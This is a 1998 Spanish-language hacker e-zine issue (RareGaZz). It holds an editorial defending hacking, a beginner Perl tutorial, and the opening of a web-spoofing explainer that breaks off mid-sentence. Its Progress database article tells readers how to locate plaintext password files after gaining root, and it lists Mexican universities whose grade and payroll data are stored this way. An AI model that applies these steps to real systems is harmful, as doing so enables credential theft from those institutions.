
	   ----------------------------------------------------
 Ao 2/Numero 14                                       Septiempre de 1998

				           
	   ----------------------------------------------------

   ooooooo       oo  ooooooo  oooooo     ooooo        oo   oooooo  oooooo
   $$""$$"    o$"$$  $$""$$"  $$       o$$""o,     o$"$$   """$$   """$$
   $$o$$"    $$  $$  $$o$$"   $$$$$$   $$    $$   $$  $$     $$      $$
   $$$$$    $$   $$  $$$$$    $$""""   "$o   $$  $$   $$    $$"     $$"
   $$" $$   $$$$$$$  $$" $$   $$        "$o  $$  $$$$$$$   o$"     o$"
   $$  "$$  $$   $$  $$  "$$  $$ooooo     "$o$$  $$   $$  o$$oooo o$$oooo
   ""   """ ""   ""  ""   """ """""""        ""  ""   ""  """"""" """""""

	   ----------------------------------------------------
				    

                        "La verdad nos hara libres"
	   ----------------------------------------------------

        
                            Editor: Cytorax y Azumlord
                       Co-editores: Azumlord y GuyBrush
                    RareGaZz Team : 12r, Arkangel, AzumLord, Cytorax  
                                    Grovvy,  Guybrush, KillerBot 
                                    Mr.X, Orion, PaTa, RareTrip,
                                    Senpai, ServerHacker, Vov_77
                                    y Yo_soy.
		   Agradecimientos: Jhocker, Mr.Nexus, Barbwired/Freedom
	  Distribuidores Oficiales: raregazz.islatortuga.com    
				    raregazz.acapulco.uagro.mx   
		     E-mail Ofical: raregazz@iname.com
	       Saludos (Oficiales): #RaZa MeXicaNa Team, X-ploit Team,
				    MEMR, LIZA.
	   Frase del Dia (Oficial): "ip!, ip!, echame las otras" Azumlord
				    despues de una mala noche.
      Rayadas de Madre (Oficiales): jmasojan, el lamer de mierda que borro
				    los archivos del ftp de la lista de los
				    RareDudeZz y el(los) idiota(s) lamer(s)
				    que avisaron a los de geocities sobre la
				    pagina de SET.
	   Comentarios (Oficiales): Mas vale tarde que nunca :-)


[ E d i t o r i a l ]

   Hola de nuevo lector de esta espectacular revista. He decidido hacer esta
editorial, no como las convencionales, sino como una que nos ponga a pensar
un poco, una que nos haga recapacitar, conste que no quiero hacer cambiar de
forma de pensar a nadie, solo que den su punto de vista.

   Por ejemplo todos no atacamos contra todos sin saber la explicacion de lo
que es el bien o de lo que es el mal, muchos acusan a los hackers de ser gente
"mala" pero que es a lo que ellos definen como malo, solo juzgan sin saber
estas importantes definiciones.

   Primero, que es el bien?, segun Federico Nietzsche es todo lo que eleva en
el hombre el sentimiento de la potencia, la voluntad de la potencia, la
potencia en si.

   Ahora, que es lo malo?, es todo cuyas raices residen en la debilidad. Como
una pequea conclusion Que los debiles y los fracasados perezcan!.

   Bueno creo que con estas dos definiciones podemos empezar a defendernos, ya
que nosotros no hacemos nada malo solo queremos conocer mas, mas y mas a lo
nos lleva a una elevacion de nuestra potencia, que al contrario de hacer algo
malo como la gente dice o divulga, seria el ser una escoria unos debiles y
unos fracasados, que es lo que menos queremos ser y que talvez la gente que
nos acusa de malos tienen miedo a lo que sabemos, como dice en la oracion
anterior Que los debiles y los fracasados perezcan!, es asi como presento
esta revista, desde otro punto de vista, espero que les sirva de algo y
piensen antes de actuar.

   Esto no fue un sermon o algo por el estilo, sigan adelante que la revista
esta EXCELENTE. NoS vEmOS lUeGO, y LoS dEjO cON eSTA fRaSE:
                                
                 El amor en la familia en donde se da?
                       En el padre o en la Madre.



	 [ C o n t e n i d o s ]Ŀ
       Ĵ                                                        
          +Editorial -----------------------> Cytorax           
          +Progress ------------------------> Azumlord          
          +Manual de Bolsillo de Perl ------> Cytorax           
          +Web Spoofing --------------------> GuyBrush          
          +Peligro en Windows --------------> Yo_Soy            
          +Introduciendo tus exploits ------> Yo_Soy            
          +Esteganografia ------------------> PaTa              
          +Curso de Antivirus --------------> Jhocker           
          +Back Orifice --------------------> Barbwired/FREEDOM 
          +FuCKiNG TeLMeX ------------------> Juan Pablo        
          +Reflexiones de Nadie ------------> Mr. Nexus         
          +Bugs y Exploits -----------------> PaTa              
          +Letz Hack -----------------------> Azumlord          
          +Accediendo al IRC por telnet-----> Senpai            
          +Cartas del Lector ---------------> GuyBrush          
          +NotiLOONZ -----------------------> GuyBrush/Azumlord 
          +Llaves PGP ----------------------> RareGaZz Staff    
          +DESPEDIDA?? ---------------------> Cytorax/Azumlord  
        
         

                      "El ser es, y el no ser no es"
           Mi maestra de filosofia tratando de explicar ese dilema.

  01010101010101010101010101010101010101010101010101010101010101010101010
  10                                                                   01
  01 #!/bin/RareGaZzsh                                                 10
  10 # La informacion contenida en este zine tiene fines completamente 01
  01 # de entretenimiento y educativos, los autores de  la informacion 10
  10 # aqui presentada no se hacen responsables de los  posibles daos 01
  01 # que se puedan ocasionar......                                   10
  10                                                                   01 
  01010101010101010101010101010101010101010101010101010101010101010101010

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Progress -=( Azumlord )=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[ D i s c l a i m e r  ]

   La   informacion  aqui  presentada,  tiene  fines  solamente  educativos,
cualquier  uso indebido de la informacion aqui contenida  es responsabilidad
de usted!  ( Demonios,  eso  lo dijeron  en un comercial???), el autor no se
hace  responsable  de  los daos materiales o psicologicos que sean producto
de un mal uso de lo aqui expuesto.

[ L a  H i s t o r i a ]

   Progress   Software   Corporation   fue   fundada  en  1981  en  Bedford,
Massachusetts,  E.U.A:  y  es  una  compaia  lider en la oferta de bases de
datos,  herramientas  de desarrollo y soluciones empresariales "A Prueba del
Futuro", y para solucionar  los  problemas en los procesos de las empresas y
proveer Ventajas competitivas reales.

   Progress Software  se  empezo a conocer en Mexico a partir de 1989 con la
distribucion de sus productos a traves de los siguientes distribuidores:

	   * 1989 - 1991 : Genetec, Dataflux
	   * 1991 - 1993 : Tecnologia en Desarrollo de Sistemas
		   (Actual Asociado en Aplicaciones Progress)

   En 1993 debido al gran crecimiento y aceptacion de los productos Progress
en Mexico,  la Corporacion decide establecer la representacion directa de la
compaia,  fundandose  el  22  de febrero de 1993 la subsidiaria mexicana de
Progress Software Corporation.

[ Q u e  e s ? ? ]

   Progress  es   un  lenguaje  de programacion de cuarta generacion el cual
permite  manejar  grandes  bases  de bases de datos y dar soluciones a todos
los sectores de la industria, como son el sector de Manufacturera, Finanzas,
Distribucion, Salud, Gobierno, Comercio, Telecomunicaciones, Educacion, etc.
y mercados verticales como Contabilidad y Recursos Humanos.

   Progress  provee un ambiente para el desarrollo rapido de aplicaciones en
bases  de  datos  relacionales  y  un conjunto de herramientas de desarrollo
graficas (GUI) y de modo caracter.  Con Progress se desarrollan aplicaciones
empresariales para cliente/servidor y modo host, que son indepedientes de la
base de datos, el sistema operativo, y la interfaz de usuario.

   Progress  incorpora la tecnologia  de  objetos  mediante componentes  que
permiten fabricar y ensamblar aplicaciones rapidamente. Progress es facil de
aprender, las herramientas graficas de desarrollo guian al programador en su
esquema  de  desarrollo, el Progress 4GL es un lenguaje completo con el cual
no  se  requiere de la utilizacion de un lenguaje de tercera generacion para
programar tareas complejas. 

   Adicionalmente, una aplicacion desarrollada en Progress es facil de poner
en produccion, bajo consumo de recursos de maquina y gran portabilidad sobre
multiples plataformas tales como Unix, Windows, AS/400, y Novell.Igualmente,
una  aplicacion  desarrollada  en  Progress puede ser puesta en marcha sobre
otras  base  de  datos  distintas  de  Progress  tales  como Oracle, Sybase,
DB/2-400, SQL Server y ODBC-compliant.


[ C o m o  H a c k e a r l o ? ? ]

   Como  ya  vimos anteriormente, Progress es una herramienta que te permite
administrar  con facilidad y *confiabilidad* grandes bases de datos, asi que
en la  mayoria  de los casos se restringira el acceso a estas bases de datos
utilizando un password  y estableciendo determinados permisos a cada usuario
de estas bases de datos.

   Tb.  como  ya se establecio anteriormente Progress es una herramienta con
la cual se  generan  apliaciones INDEPENDIENTES del Sistema Operativo,  pero
suponiendo que  el  Progress se este corriendo bajo un ambiente Unix, lo que
tendrias que  hacer es obtener root en ese sistema o por lo menos un usuario
con permisos de  administrador,  despues de que ya hayas obtenido  alguno de
los dos, viene  lo  mas  sencillo,  encontrar  el archivo de passwords, esto
sera  algo  sencillo   si  tomamos   en cuenta  que  puede  tener  cualquier
nombre pero su terminacion tiene  que  ser  *.d,  de  tal  manera que puedes
ejecutar este comando para encontrarlo.

 #find / -name *.d -print

  En este caso el archivo tenia un nombre muy obvio usuario.d y su contenido
es el siguiente:

"administrador" "Administrador del Sistema" "adm000.p" "per001" "1" "Eureka"
 |-----1-----|   |---------2------------|    |---3---|  |--4--| |5| |--6--|

  1.- Nombre de Usuario
  2.- Informacion adicional sobre el usuario
  3.- Rutina para verificar el passwd
  4.- Perfil del usuario algo asi como el .profile
  5.- Privilegios del usuario.
  6.- Password 

   Como se puede ver cada  campo esta separado por comillas y un espacio en
blanco, ademas el password aparece desencriptado };-)

 NOTA: Como  ya  comente  anteriormente el Progress es todo un lenguaje de
       programacion, es decir, en algunos casos los administradores pueden
       cambiar la rutina  que verifica el password, o agregar algun metodo
       de encriptacion del mismo. PERO al parecer todas las  instituciones,
       empresas u organizaciones que adquieren el Progress reciben un curso
       de capacitacion, el cual es el mismo para TODOS, si, si ya se que se
       estaran preguntando y eso que????, pues si el curso es el mismo para
       todos quiere  decir que estaran  usando rutinas muy semejantes a las
       que  expuse,  quiero  agregar  que yo  lo probe en dos instituciones
       diferentes y usaban el mismo metodo :-)

[ Q u i e n  l o  u s a ? ? ]

   Como ya se habran dado cuenta, Progress es una herramienta muy versatil,
y es usado en todos los sectores de la industria, pero no estaria nada mal
saber quien lo usa exactamente, jeje bueno pues he aqui una lista muy buena,
de las Universidades que usan esta "oh!, gran herramienta" };-)

   Fue una verdadera pena solo encontrar las Universidades que utilizaban
esta herramienta, me hubiese gustado haber encontrado tambien a las empresas
e instituciones que utilizan el Progress. :-(

ITAM
http://www.itam.mx

ITESM (10 campus)
http://www.sistemas.itesm.mx

UNIVERSIDAD DE LAS AMERICAS (UDLA)
http://www1.udla.mx/index.html

UNIVERSIDAD POPULA AUTONOMA DEL ESTADO DE PUEBLA (UPAEP)
http://www.pue.upaep.mx

UNIVERSIDAD LA SALLE
http://www.ulsa.mx

UNIVERSIDAD CHAPULTEPEC
http://www.univchapultepec.edu.mx

UNIVERSIDAD LATINOAMERICANA (ULA)
http://www.ulanet.mx

UNIVERSIDAD DEL VALLE DE MEXICO (7 CAMPUS)

INSTITUTO TECNOLOGICO DE CELAYA

UNIVERSIDAD VERACRUZANA

INSTITUTO POLITECNICO NACIONAL (C.I.C)

UNIVERSIDAD IBEROAMERICANA GOLFO CENTRO
http://www.uiagc.pue.uia.mx

UNIVERSIDAD AMERICANA DE ACAPULCO
http://www.uaa.edu.mx

CENTRO NACIONAL DE INVESTIGACION Y DESARROLLO TECNOLOGICO

UNIVERSIDAD LATINA DE AMERICA

UNIVERSIDAD ISEC

INSTITUTO DE ESTUDIOS SUPERIORES DE TAMAULIPAS
http://www.iest.mx

UNIVERSIDAD KINO
http://www.unikino.mx

UNIVERSIDAD AUTONOMA DE NUEVO LEON
http://www.dsi.uanl.mx

UNIVERSIDAD DEL NORTE
http://www.uninorte.edu.com

UNIVERSIDAD REGIOMONATANA
http://www.ur.mx

   Que!!!!!!!!??????????,  que  porque  las  Universidades  adquirieron  el
Progress???, lo adquirieron para manejar cosillas sin importancia como  son
las  calificaciones y colegiaturas de los alumnos, nominas de los maestros,
y cosas por el estilo....... ;-)

[ D e s p e d i d a ]

   Pues bien eso es todo, son las 2:43 a.m. y tengo un sueo de la chingada
ah!!!, casi  lo  olvido  quiero  pedir  disculpas  por el uso repetitivo de
las palabras tales como, "Como" y similares............

-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\
-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//


                   \   /                     
   Por: Cytorax    \  MANUAL DE BOLSILLO DE PERL I  / Cytorax@BigFoot.com 
                   \   /                     

                     http://members.xoom.com/cytorax/                     
                    http://members.tripod.com/~cytorax/                   


 INTRO
   Perl que significa "Practical Extraction and Report Language" es un
lenguaje de programacion medianamente nuevo, el cual surgio de otras
herramientas de UNIX como son : sed,grep,awk,c-shell. Principalmente sirve
para labores de procesamiento de texto, lo cual lo hace en una forma facil y
clara, no como es en C o Pascal; tambien sirve para la programacion de
software de sistemas; y ahora ultimo se ha consolidado como "el" lenguaje
para programar aplicaciones para WWW, por ejemplo un programa que ponga en
pantalla las notas de un alumno dada su matricula, etc. Por todas estas
potencialidades es que estudiaremos Perl.

Nuetro primer programa sera el ya tipico, que imprime Hola, Mundo! : 

#!/usr/local/bin/perl
print "Hola, Mundo!\n";

La primera linea lo que hace es llamar al compilador de Perl.
La segunda linea imprime Hola, Mundo! y un cambio de linea(\n).
Debemos decir que todas las lineas (salvo contadas excepciones) de un programa 
en Perl terminan con ';' . 
Veamos un programa ahora en el cual se interactua con el usuario : 

#!/usr/local/bin/perl
print ("Cual es tu nombre?");
$nombre=<STDIN;
chop($nombre);
print "Hola, $nombre!\n";

En la segunda linea igual que antes se imprime un mensaje, pero ahora vemos 
que esta con '()', estos son opcionales. En la siguiente linea se introducen 
dos nuevos conceptos, primero el de variable ($name),- en el STAGE I 
veremos que las variables (escalares) empiezan con '$'-; <STDIN lo que indica 
es que se leera una linea desde la entrada estandard. En la cuarta linea la 
funcion chop() lo que hace es sacarle el ultimo caracter a $name, es decir le 
quita el Enter (cambio de linea). Y finalmente en la ultima linea lo 
saludamos, en esta vemos que $name toma el valor que se le ingreso. 
Veamos un programa en el cual se eligen opciones : 

#!/usr/local/bin/perl
print ("Cual es tu nombre?");
$nombre=<STDIN;
chop($nombre); # saca el enter a la linea leida
if ( $name eq "Claudio")
   {
   print "Hola, Claudio! Como estas!\n";
   }
else
   {
   print "Hola, $nombre\n";
   }

En la tercera linea vemos el caracter '#' que significa comentario.En la 
quinta linea se introduce el if, el cual mediante el eq compara dos strings: 
$name y "Claudio"; hay que hacer notar que el cuerpo del if siempre va entra 
llaves(aunque sea una linea), al igual que el else, el cual significa que se 
imprime "Hola, $name\n" si no se cumplio la condicion del if. 
Un ultimo programa, en el cual se introducen los ciclos: 

#!/usr/local/bin/perl
print ("Cual es tu nombre?");
$nombre=<STDIN;
chop($nombre);
$palabrasec="llama";
if ( $name eq "Claudio")
   {
   print "Hola, Claudio! Como estas!\n";
   }   
else
   {
   print "Hola, $nombre\n";
   print "Cual es la palabra secreta?";
   $palabra=<STDIN;
   chop($opcion);
   while ( $palabra ne $palabrasec )
      {
      print "Error, intentalo de nuevo, cual es la palabra secreta?";
      $palabra=;
      chop($palabra);
      }
   }

En la 16a linea usamos el while, el cual al igual que en otros lenguajes 
significa que las lineas entre las llaves se repetiran mientras sea verdadera 
la condicion, la cual en este caso pregunta si $palabra no es igual a 
$palabrasec.

 STAGE I
Datos escalares
En Perl existen dos tipos de datos, numeros y strings, pero entre los numeros 
estan los enteros y los reales.

Ej: 4,7.5,"hola"

Float : Ej: 1.25,4.25e45,-6.5e24,-1.2E-23

Integer : Ej: 12,15,-2004,3485
	      0377 # 377 octal <= 255 decimal
	      -0xff # ff negativo en hexadecimal <= -255 decimal

Strings : Ej: "hola",'Como estas'
Para senalar los strings hay dos formas de hacerlo: 
 Single quoted : 
 
 Ej:'hola' # h,o,l,a
    'don\'t' # d,o,n,',t
    '' # string nulo
    'donde\\vas' # d,o,n,d,e,\,v,a,s
    'hola\n' # h,o,l,a,\,n
    'hola
     tu' # h,o,l,a,[enter],t,u ( 11 caracteres )
 Double quoted 
 
 Ej:"hola mundo\n" # hola mundo[enter]
    "cola\tsprite" # cola[tab]sprite

 Como vimos en estos ejemplos en los double quoted strings, se reconocen cosas
como \n,\t,etc. mientras que con single quoted no, pero tiene la ventaja de 
poder escribirse literalmente lo que se pone entre ellos. 
 
 Operadores
  Numeros : 

Ej:2+3 # 5
   5.1-2.4 # 2.7
   3*12 # 36
   2**3 # 8

Strings : a) Concatenacion(.):


Ej:"Hola"."mundo" # "Holamundo"
   "juan"." "."pedro" # "juan pedro"
b) Operador de repeticion de strings(x) : 

Ej:"juan"x3 # "juanjuanjuan"
   "pedro"x(4+1) # "pedropedropedropedropedro"
c) Operadores de comparacion : 
Numeros Strings
==      eq
!=      ne
<       lt
	gt
<=      le
=       ge

Conversion entre nmeros y strings
"123.45juan" # si es operado como numero toma el valor 123.45

Ej: $a="3b";
    $b=$a+5; # $b=8
Conversion al reves : 

Ej: $a=5;
    "x".$a  # "x5"

Variables escalares
Una variable escalar es un nombre que mantiene un valor, en Perl las variables 
deben empezar con '$' . 

Ej:$a,$nombre

Operadores
Ej:$a=17;
   $b=$a+3;
   $b=$b*2;
   $a=4+($a=3); # $b=7,$a=3
   $d=$c=5;

Interpolacion de variables escalares en strings
Si una variable es puesta en un string double quoted (") se interpola el valor 
de la variable. 

Ej:$a="juan";
   $b="hola $a"; # $b="hola juan"

Y si una variable se pone entre single quoted (') no se interpola el valor de 
la variable. 

Ej: $x="hola";
	$y='$x amigo'; # asigna '$x amigo a $y
En los strings existen tambien algunos modificadores: \U,\u,\L 

Ej: $mayjuan="\Ujuan"; # $mayjuan="JUAN" 
    $juan="juan"; $mayjuan="\U$juan"; # $mayjuan="JUAN"
    $capjuan="\u$juan"; # $capjuan=Juan
    $pedro="\LPEDRO"; # $pedro="pedro"
    $cappedro="\u\LPEDRO"; #cappedro="Pedro"
    $maypedro="PEDRO"; $cappedro="\u\L$maypedro"; # $cappedro="Pedro"

<STDIN como valor escalar
$a=<STDIN lee una linea de la entrada estandard y la guarda en $a 
Salida con print
print("Hola Mundo\n"); <= print "Hola Mundo\n"; 
El valor undef
Que pasa si usamos una variable antes de darle un valor ? , nada fatal, se 
asigna como cero si es numero 0 "" si es como string. 

Ej: $a=3;
	$b=$a+$c; # $b=3
    $x="hola";
    $y=$x.$z; # $y="hola"

 STAGE II
Arreglos
Un arreglo es una lista ordenada de datos escalares. Los arreglos pueden tener 
cualquier numero de elementos.

Representacion literal
Un arreglo es una lista de valores separados por coma y dentro de parentesis. 
Los valores de los elementos pueden ser de distinto valor. 

Ej:   (1,2,3)
      ("juan",4.5)
Sus valores no necesariamente tienen que ser constantes, puede tener 
variables. 

Ej: ($a,17)
    ($b+$c,$d+$e)
El arreglo vacio es representado por () .

Variables
Asi como las variables escalares se representan con un '$' al comienzo, las 
variables de tipo arreglo empiezan con '@'. 

Ej: @a , @hola

Operadores
Asignamiento:
Mediante el operador '=' le podemos dar a una variable arreglo un valor. 

Ej:@a=(1,2,3);
   @b=("yo","tu",2);
   @c=@a; # copia el arreglo @a en @c
   @d=($x,$y);
El largo de un arreglo ( ej : @a ) queda guardado en $#a. 

Acceso a los elementos
Para enumerar los elementos de un arreglo se empieza desde el 0. El primer 
elemento del arreglo @a es $a[0], vemos que para accesar un elemento 
especifico del arreglo ya no se ocupa '@'. 

Ej: @a=(7,8,9);
    $b=$a[0]; # asigna 7 a $b
    $a[1]=5; # ahora @a es (7,5,9)
    $a[2]++; # suma uno al tercer valor de @a siendo ahora (7,5,10)
    $c=$a[0]+$a[1];
Hasta ahora solo hemos visto que los indices de los arreglos son constantes, 
pero tambien pueden ser variables. 

Ej:@juan=(7,8,9);
   $a=2;
   $b=$juan[$a];
   $c=$juan[$a-1]; # $c=8
   $d=$a[$#a]; # $d=9
Si uno accesa un elemento del arreglo mas alla del fin del arreglo el valor 
undef es retornado. 

Ej: @a=(1,2,3);
    $b=$a[7]; # $b es 0 o "" , dependiendo del contexto
Asignar un valor a un elemento ams alla del fin del arreglo, lo que hace es 
agrandar el arreglo poniendo undef a los valores intermedios. 

Ej: @a=(1,2,3);
    $a[3]="hola"; # @a es ahora (1,2,3,"hola")
    $a[6]="chao"; # @a es ahora (1,2,3,"hola",undef,undef,"chao")

Push y Pop
Una comun utilizacion de los arreglos es como stacks, donde los nuevos valores 
son agregados y borrados por el lado derecho del arreglo. Push() es utilizado 
para agregar elementos y pop() para sacar. 

Ej: @lista=(1,2,3);
    push(@lista,5); # @lista=(1,2,3,5)
    $a=pop(@lista); # $a=5, @a=(1,2,3)

Shift y Unshift()
Al igual que Pop y Push estos sacan y meten elementos de un arreglo, pero lo 
hacen por el lado izquierdo. 

Ej: @a=(1,2,3);
    unshift(@a,0); # @a=(0,1,2,3);
    $x=shift(@a); # $x=0 , @a=(1,2,3)  
    unshift(@a,5,6,7) # @a=(5,6,7,1,2,3)

El Operador reverse
reverse() invierte el orden de los elementos de un arreglo, retornando la 
lista invertida. 
	
Ej: @a=(1,2,3);
    @b=reverse(@a); # @b=(3,2,1)   
    @c=reverse(1,2,3); # lo mismo
Notemos que la lista que se le pasa como parametro permanece inalterable. Si 
nosotros queremos dejar la lista invertida ahi mismo debemos hacer : 
@a=reverse(@a).

Sort
Sort toma una lista y la ordena ascendentemente ( segun codigo ASCII ) y 
retorna la lista ordenada. 

Ej: @a=sort("grande","pequeo","chico"); # @a=("chico","pequeo","grande");
    @b=(1,2,4,8,16,32,64);
    @c=sort(@b); # @c=(1,2,16,32,4,64,8)
Como vemos en este ultimo ejemplo sort()ordena por strings, no numericamente. 

Chop
chop() trabaja igual que en variables escalares, le saca el ultimo caracter a 
cada elemento del arreglo. 

Ej: @a=("hola","mundo\n","felices dias");
    chop(@a); # @a=("hol","mundo","felices dia")

<Stdin como arreglo
<STDINretorna la siguiente linea de input de la entrada estandard y lo hace en 
un con texto escalares decir :
$x=<STDIN; # $x guarda un string , una linea leida de la entrada estandard 
Tambien se puede usar en un contexto de arreglo :
@a=<STDIN; # lee todas las lineas de la entrada estandard y guarda cada linea 
en un elemento del arreglo @a. 

 STAGE III
Estructuras de control
Al igual que en la mayoria de los lenguajes de programacion , en Perl existen 
estructuras como if, for, while.

If, Elseif, Else
La estructura de un if es la siguiente : 

if ( .... ) {
    ......;
    ......;
}
elsif ( .... ) {
    ......;
    ......;
}
elsif ( .... ) {
    ......;
    ......;
}
else ( .... ) {
    ......;
    ......;
}
Notemos que los elsif y el else van solo si el usuario desea varias preguntas, 
se podria usar por ejemplo : 

if ( $a < 18 )
{
print "Tu eres menor de edad\n";
}
else
{
print "Eres un adulto\n";
}
o : 

if ( $a == 0 )
{
$ind++;
print "Incorrecto\n";
}
Digamos tambien que aunque sea una instruccion por if debe ir entre llaves.

While y Until
La forma del while es : 

while ( condicion ) {
....;
....;
}
Lo que esta entre llaves se ejecuta mientras sea veradera la condicion. 

Ej: print "Cuantos aos tienes?";
    $a=<STDIN;
    chop($a);
    while ( $a  0 )
       {
       print "El ao pasado tenias $a aos\n";
       $a--;
       }
La forma del until es : 

until ( condicion ) {
...;
...;
}
A diferencia del while el until se ejecuta al menos una vez , y se sigue 
mientras la condicion sea falso , es decir es similar al Repeat/Until de 
Pascal. 

For
La forma general del for es : 

for ( exp_inicial; exp_testeo; exp_increm){
...;
...;
}

Ej: for ( $x=0;$x<10;$x++)
       {
       print "Llevas $x puntos\n";
       }

Foreach
El foreach de Perl es muy similar al de C-shell , recibe una lista de valores 
y asigna cada uno de los valores de la lista a una variable de lectura . La 
estructura del foreach es : 

foreach $a ( @alguna_lista ) {
...;
...;
...;
}

Ej:@a=(3,5,7,9);
   foreach $x (@a) {
      $y=$x*3;
      print "$y\n";
      }
Imprime 9,15,21,27 .


 STAGE IV
Lectura de Archivos y Entrada Estandar

Entrada Estandard
Como ya dijimos para leer una linea desde la entrada estandard se debe asignar 
una variable escalar a <STDIN 

Ej:$a=<STDIN; # guarda en $a la linea leida 
   chop($a);  # le sacamos el enter que tienen todas las lineas por su ingreso

Como procesar toda la entrada estandard ?:

while ( $a=<STDIN ) 
{
manejo de la linea leida ..... ;
}

El while termina cuando ya no encuentra una linea ingresada desde la entrada
estandard.

Otra forma de hacer esto ultimo ( procesar toda la entrada est. ) es asignar
<STDIN a una variable de tipo arreglo Ej : @b=<STDIN ; # en $b[0] guarda la 1a 
linea, en $b[1] la 2a .... 

Lectura de Parametros Pasados a un Programa
Dentro de un programa en Perl los argumentos que se le pasan quedan guardados 
en el arreglo @ARGV . 

Ej: %vi prog1.pl
    #!/usr/local/bin/perl
    print "Tu ingresaste las palabras:\n";
    for($x=0;$x

 DESPEDIDA
   Bueno espero que les halla gustado este breve cursillo en la proxima
revista, seguiremos con este manual pero introduciendonos mas en el tema, osea
sere mas profundo y un poco mas complicadillo, pero no te preocupes hay viene
lo bueno, claro que me falto informacion, pero por falta de tiempo, salud
entre otras cosas no pude profundizar esta vez pero mantente al tanto.


 MI LLAVE PGP
   Localizada en su debido apartado =) .


_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m
-w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w-

			   &&&&&&&&&&&&&&&&&&&&&&&
			   &&    Web Spoofing   &&
			   &&&&&&&&&&&&&&&&&&&&&&&


Introduccion
------------

Este  documento  describe  un  ataque de  seguridad en  Internet que  puede 
poner  en peligro  la privacidad de los usuarios de la World Wide Web y la  
integridad de sus datos. El  ataque puede  ser llevado  a cabo  en los  
sistemas de  hoy en dia, poniendo en peligro a los usuarios de los navegadores 
mas comunes, incluyendo el Netscape Navigator y el Microsoft Internet 
Explorer.

El Web Spoofing permite a un atacante crear una  "copia sombra/shadow copy" de 
toda la World Wide Web. Los  accesos a la Web shadow  son encauzados por la 
maquina del atacante, permitiendo a este monitorizar  todas  y cada  una de  
las actividades  de  la  victima incluyendo  las entradas  de passwords o 
numeros de  cuenta que haga este. El atacante  puede tambien hacer que datos 
falsos o engaosos sean  enviados a  servidores Web en nombre  de la victima, 
o  a la victima en nombre de cualquier servidor Web.  Resumiendo, el atacante
observa  y controla todo lo  que la victima hace en el Web.


Ataques Spoofing
----------------

En un ataque spoofing, el atacante  crea un contexto  engaoso para asi 
engaar a la  victima de forma que haga  una decision relacionada con la 
seguridad inapropiada. Un ataque spoofing es como una estafa: el atacante 
monta un mundo falso pero convincente alrededor de la victima. La victima hace  
algo  que podria  ser apropiado si  el  falso mundo  fuese  real. 
Desafortunadamente, las actividades que  parecen razonables  en el  falso 
mundo  podrian tener  efectos desastrosos en el mundo real.

Los ataques spoofing son  posibles tanto en  el mundo fisico como en el 
electronico. Por ejemplo, ha habido  varios incidentes  en los  que los 
criminales  ponen  maquinas  expendedoras  falsas, normalmente en  areas 
publicas de grandes  almacenes [1]. Las maquinas aceptan las tarjetas ATM y 
piden  a la  persona que  meta su  codigo PIN.  Una vez  que la maquina tiene 
el codigo PIN de la victima, puede o  bien tragarse la  tarjeta o 
"malfuncionar" y devolver la tarjeta. En cualquiera de los casos, los 
criminales tenian suficiente informacion  para copiar la tarjeta de la victima
y usar  el duplicado. En  estos ataques, la  gente era  engaada por el 
contexto que  veian:  la localizacion  de las  maquinas, su tamao  y  peso, 
la  forma  en que  estaban  decoradas, y  la apariencia de sus pantallas 
electronicas.

La gente que usa  sistemas informaticos a menudo  toma decisiones relacionadas 
con  la seguridad basadas en  indicaciones contextuales que ven.
Por ejemplo,  puedes decidir teclear tu numero de cuenta banacario  por que 
crees  que estas visitando la Web page de tu banco. Esta creencia puede surgir
por que la pagina  tiene un aspecto familiar, por que el URL del banco aparece
en la linea de localizacion del navegador, o por otras razones.

Para apreciar  el rango  y severidad  de posibles  ataques spoofing, debemos
profundizar  en dos partes de la definicion de spoofing: decisiones 
relacionadas con la seguridad y contexto.


Decisiones relacionadas con la seguridad
----------------------------------------
Por "decisiones relacionadas  con la seguridad",  queremos decir cualquier 
decision que toma una persona que pueda  llevar a  resultados no deseados como 
una violacion de la privacidad o manejo no autorizado  de datos. El decidir  
divulgar informacion sensible, como por ejemplo tecleando un password o  un 
numero de cuenta, es  un ejemplo de  una decision relacionada  con  la 
seguridad.
Elegir el aceptar  bajar un documento  es una decision  relacionada con la 
seguridad, ya  que en muchos casos  un documento  bajado es  capaz de  
contener elementos  maliciosos que  daan  a  la persona que recibe el 
documento [2].

Incluso la  decision de  aceptar la  exactitud de  informacion desplegada por 
tu ordenador puede tener relacion con la seguridad. Por ejemplo, si decides 
comprar una accion basada en informacion que  recibes de un teletipo  de 
acciones online, confias en que la informacion que proporciona el teletipo sea  
correcta. Si alguien  pudiera presentarte precios  de acciones incorrectos, 
podrian hacerte embarcar  en una transaccion  que de otro modo no hubieras 
hecho, y esto te podria costar dinero.


Contexto
--------

Un navegador  presenta  muchos tipos  de contexto de los  que el usuario 
podria fiarse para tomar decisiones. El  texto y  los graficos  de una  pagina  
Web  podrian dar  una impresion  sobre  la procedencia de la pagina; por  
ejemplo, la presencia de un logo corporativo implica que la pagina se creo en 
una cierta corporacion.

La apariencia de un objeto podria sugerir una cierta impresion; por ejemplo, 
texto de color verde neon  sobre un  fondo morado  probablemente venga  de la  
revista Wired. Podrias pensar que estas tratando con  una ventana  contextual  
cuando lo  que realmente  estas viendo  es simplemente  un rectangulo con  un 
borde y colores diferentes que las zonas de alrededor de la panatalla. Objetos
graficos particulares  como las file-open  dialog boxes son  immediatamente 
reconocidas como  que tienen  que  tener  un  proposito.  Los  usuarios  de  
Web  experimentados  reaccionan  a  dichas indicaciones  de la  misma forma 
que  los conductores experimentados reaccionan  a las seales de stop sin 
necesidad de leerlas.

Los nombres  de los  objetos pueden sugerir  contextos. La gente a menudo 
deduce lo que hay en un archivo  por su nombre.  Es manual.doc el texto  de un 
manual  de usuario? (Podria ser otra clase de  documento, o  podria no  ser ni  
siquiera  un  documento.) Las  URLs  son  otro  ejemplo.  Es MICR0S0FT.COM la  
direccion de  una gran  empresa  de software?  (Por un  momento  esa  
